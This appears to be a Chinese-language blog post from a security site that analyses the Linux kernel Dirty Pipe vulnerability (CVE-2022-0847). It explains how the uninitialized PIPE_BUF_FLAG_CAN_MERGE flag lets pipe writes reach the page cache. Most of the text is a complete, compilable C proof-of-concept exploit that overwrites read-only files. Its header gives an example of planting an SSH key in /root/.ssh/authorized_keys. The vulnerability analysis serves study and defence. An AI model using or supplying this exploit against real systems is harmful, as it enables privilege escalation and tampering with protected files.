

iHacking 511




CVE-2022-0847 DirtyPipe脏管道漏洞是Linux内核中的一个漏洞,该漏洞允许写只读文件,从而导致提权。

调试环境ubuntu 20.04Linux-5.16.10qemu-system-x86_64 4.2.1漏洞验证





...    if (pipe(p)) abort();    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);    static char buffer[4096];    for (unsigned r = pipe_size; r > 0;) {        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;        write(p[1], buffer, n);        r -= n;    }...

在进行管道写的操作时,内核是采用pipe_write函数进行操作,这里截取了关键部分,在进行管道写的时候会判断通过函数is_packetized去判断是否为目录属性,如果不是则将缓冲区的标志位设置为PIPE_BUF_FLAG_CAN_MERGE,这个标志位非常关键,是导致漏洞成因,因此poc为了使16个管道缓冲区都设置PIPE_BUF_FLAG_CAN_MERGE标志位,因此选择循环16次, 并且将每个管道缓冲区都写满。


...for (unsigned r = pipe_size; r > 0;) {        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;        read(p[0], buffer, n);        r -= n;    }...


...ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);...


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...nbytes = write(p[1], data, data_size);...











/* SPDX-License-Identifier: GPL-2.0 *//* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <max.kellermann@ionos.com> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation:  */#define _GNU_SOURCE#include <unistd.h>#include <fcntl.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/stat.h>#include <sys/user.h>#ifndef PAGE_SIZE#define PAGE_SIZE 4096#endif/** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */static void prepare_pipe(int p[2]){    if (pipe(p)) abort();    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);    static char buffer[4096];    /* fill the pipe completely; each pipe_buffer will now have       the PIPE_BUF_FLAG_CAN_MERGE flag */    for (unsigned r = pipe_size; r > 0;) {        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;        write(p[1], buffer, n);        r -= n;    }    /* drain the pipe, freeing all pipe_buffer instances (but       leaving the flags initialized) */    for (unsigned r = pipe_size; r > 0;) {        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;        read(p[0], buffer, n);        r -= n;    }    /* the pipe is now empty, and if somebody adds a new       pipe_buffer without initializing its "flags", the buffer       will be mergeable */}int main(int argc, char **argv){    if (argc != 4) {        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);        return EXIT_FAILURE;    }    /* dumb command-line argument parser */    const char *const path = argv[1];    loff_t offset = strtoul(argv[2], NULL, 0);    const char *const data = argv[3];    const size_t data_size = strlen(data);    if (offset % PAGE_SIZE == 0) {        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");        return EXIT_FAILURE;    }    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;    const loff_t end_offset = offset + (loff_t)data_size;    if (end_offset > next_page) {        fprintf(stderr, "Sorry, cannot write across a page boundary\n");        return EXIT_FAILURE;    }    /* open the input file and validate the specified offset */    const int fd = open(path, O_RDONLY); // yes, read-only! :-)    if (fd < 0) {        perror("open failed");        return EXIT_FAILURE;    }    struct stat st;    if (fstat(fd, &st)) {        perror("stat failed");        return EXIT_FAILURE;    }    if (offset > st.st_size) {        fprintf(stderr, "Offset is not inside the file\n");        return EXIT_FAILURE;    }    if (end_offset > st.st_size) {        fprintf(stderr, "Sorry, cannot enlarge the file\n");        return EXIT_FAILURE;    }    /* create the pipe with all flags initialized with       PIPE_BUF_FLAG_CAN_MERGE */    int p[2];    prepare_pipe(p);    /* splice one byte from before the specified offset into the       pipe; this will add a reference to the page cache, but       since copy_page_to_iter_pipe() does not initialize the       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */    --offset;    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);    if (nbytes < 0) {        perror("splice failed");        return EXIT_FAILURE;    }    if (nbytes == 0) {        fprintf(stderr, "short splice\n");        return EXIT_FAILURE;    }    /* the following write will not create a new pipe_buffer, but       will instead write into the page cache, because of the       PIPE_BUF_FLAG_CAN_MERGE flag */    nbytes = write(p[1], data, data_size);    if (nbytes < 0) {        perror("write failed");        return EXIT_FAILURE;    }    if ((size_t)nbytes < data_size) {        fprintf(stderr, "short write\n");        return EXIT_FAILURE;    }    printf("It worked!\n");    return EXIT_SUCCESS;}

标签: #漏洞检测实验报告